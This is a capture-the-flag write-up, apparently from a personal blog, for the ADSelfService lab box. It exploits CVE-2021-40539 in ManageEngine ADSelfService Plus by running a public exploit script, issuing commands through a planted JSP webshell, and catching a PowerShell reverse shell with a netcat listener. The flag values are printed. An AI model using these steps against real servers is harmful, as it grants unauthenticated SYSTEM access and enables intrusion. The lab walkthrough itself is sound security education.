Myles Nieman
← All writeups

ADSelfService

Overview

ADSelfService is a very easy Windows box built around a known pre-auth RCE in ManageEngine ADSelfService Plus. The self-service portal is reachable on port 80 and is running a version vulnerable to CVE-2021-40539 — a REST API authentication bypass that chains into arbitrary file write and remote code execution. Exploitation drops a JSP webshell that runs under NT AUTHORITY\SYSTEM, so there is no privilege escalation step; both flags are readable immediately.

Path: ADSelfService Plus portal → CVE-2021-40539 webshell → NT AUTHORITY\SYSTEM → flags.

Enumeration

A port scan reveals a Windows host with a web service on port 80 as the only notable attack surface.

$ nmap -p- 10.129.227.78 -A

Nmap results showing port 80 open on the target

Browsing to port 80 reveals a ManageEngine ADSelfService Plus login portal branded with a 2021 ZOHO Corp. copyright.

ADSelfService Plus login portal on port 80

The version number visible on the page places this in the range affected by CVE-2021-40539.

ADSelfService Plus version information on the portal

Foothold — CVE-2021-40539

CVE-2021-40539 is a pre-authentication REST API bypass in ManageEngine ADSelfService Plus that allows an unauthenticated attacker to upload and execute arbitrary JSP files. The exploit from synacktiv/CVE-2021-40539 handles the full chain automatically:

$ git clone https://github.com/synacktiv/CVE-2021-40539.git
$ cd CVE-2021-40539
$ python3 exploit.py -t http://10.129.227.78/

The script confirms the target is vulnerable, writes two webshells, and reports the process context. The primary webshell (ws.jsp) proved unreliable, but the verification endpoint the script also places — test.jsp — is accessible and accepts command parameters:

http://10.129.227.78/help/admin-guide/test.jsp?cmd=whoami

To get a proper reverse shell, the PowerShell payload was URL-encoded and sent via a POST to test.jsp. A busybox listener caught the connection:

$ sudo busybox nc -lp 443

Reverse shell caught, running as NT AUTHORITY\SYSTEM

The shell lands as NT AUTHORITY\SYSTEM with no further escalation needed.

User and Root

Because the process already runs as SYSTEM, both flags are accessible directly from the webshell session:

SHELL> pwd

Path
----
C:\ManageEngine\ADSelfService Plus\bin

SHELL> whoami
nt authority\system

SHELL> type C:\Users\wooden_k\Desktop\user.txt
e6f5f0783e4a06910e2dac666165c4b1

SHELL> type C:\Users\Administrator\Desktop\root.txt
6e9f39e3f5e1e6be7007817e9a116cd3

Takeaways

  • CVE-2021-40539 turns an exposed ManageEngine ADSelfService Plus portal into an unauthenticated SYSTEM shell in a single script invocation — keep self-service portals off public interfaces and patched.
  • When the exploit’s primary webshell misbehaves, look for the verification endpoint the script also writes; it often accepts the same parameters and can be repurposed for a reverse shell.